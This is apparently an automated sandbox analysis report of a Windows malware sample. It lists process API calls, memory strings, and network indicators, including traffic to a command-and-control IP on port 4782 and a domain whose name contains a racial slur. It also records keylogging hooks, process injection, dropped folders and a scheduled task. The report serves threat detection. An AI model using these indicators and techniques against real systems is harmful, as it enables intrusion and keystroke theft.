Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC64D894 FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC67D894 FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC6ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC6AD894 FindFirstFileExW
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000202C0AED894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_000002A66130D894 FindFirstFileExW
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAED9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAED9D894 FindFirstFileExW
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE0D894 FindFirstFileExW
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE6D894 FindFirstFileExW
Source: C:\Windows\System32\cmd.exe | Code function: 15_2_000002512A6ED894 FindFirstFileExW
Source: C:\Windows\System32\cmd.exe | Code function: 15_2_000002512A6EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\conhost.exe | Code function: 16_2_000001BEB0A3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\conhost.exe | Code function: 16_2_000001BEB0A3D894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_0000026A879CD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537AD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537DD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000002295D56D894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306E6D894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306ECDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306ECD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 24_2_000001845B3CD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 24_2_000001845B3CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 25_2_000001ADECD4D894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 25_2_000001ADECD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D55907D894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D55907DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590AD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590DD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00000241A9EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00000241A9EAD894 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CD7319DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CD7319D894 FindFirstFileExW

Networking

Source: C:\Windows\System32\svchost.exe | Domain query: iam.nigga.dad
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 103.230.121.81:4782
Source: Joe Sandbox View | ASN Name: VPSQUANUS VPSQUANUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: iam.nigga.dad
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000000A.00000000.1990494096.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000003.2197209944.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2309743013.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990890409.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2335171262.00000202C043D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: svchost.exe, 00000032.00000000.2225892296.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2226060832.0000026EF4C74000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000000A.00000002.2308320698.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990494096.00000202C0200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990410798.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000A.00000000.1990494096.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000003.2197209944.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2309743013.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990890409.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2335171262.00000202C043D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000000A.00000000.1990494096.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000003.2197209944.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2309743013.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000001D.00000002.2312973165.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000000A.00000000.1990705079.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2318339172.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2326201564.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000026.00000000.2153697847.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2288176120.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 00000026.00000000.2153697847.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2288176120.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp, Null.5.dr, Null.28.dr | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6xG_
Source: svchost.exe, 00000031.00000002.2367360741.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2214085696.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comSRD1%
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: svchost.exe, 00000032.00000002.2288807252.0000026EF4C74000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://otelrules.azureedge.net/
Source: svchost.exe, 00000032.00000002.2291959517.0000026EF4C7B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://otelrules.azureedge.net/lse
Source: svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.com
Source: svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.com%
Source: svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2384491857.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2221218953.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comSRD13
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.26.dr | String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: svchost.exe, 00000031.00000000.2219839835.0000020D264CE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
Source: svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210283099.0000020D25681000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2316304169.0000020D25681000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comSRD1#

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Operating System Destruction

Source: C:\Windows\System32\dllhost.exe | Process information set: 01 00 00 00

System Summary

Source: Process Memory Space: powershell.exe PID: 4544, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: x.bat | Static file information: 7312129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2\IfMUlU.exe
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAED92C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$nya-SgIauazY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2\IfMUlU.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140002434
Source: C:\Windows\System32\winlogon.exe | Code function: 9_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exe | Code function: 9_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exe | Code function: 9_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC67D894
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC6ADA18
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC6A2FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 9_2_00000225DC6AD894
Source: C:\Windows\System32\lsass.exe | Code function: 10_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exe | Code function: 10_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exe | Code function: 10_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 11_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exe | Code function: 11_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exe | Code function: 11_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAF19CE18
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAF19CC94
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAF1923F0
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAEDDCE18
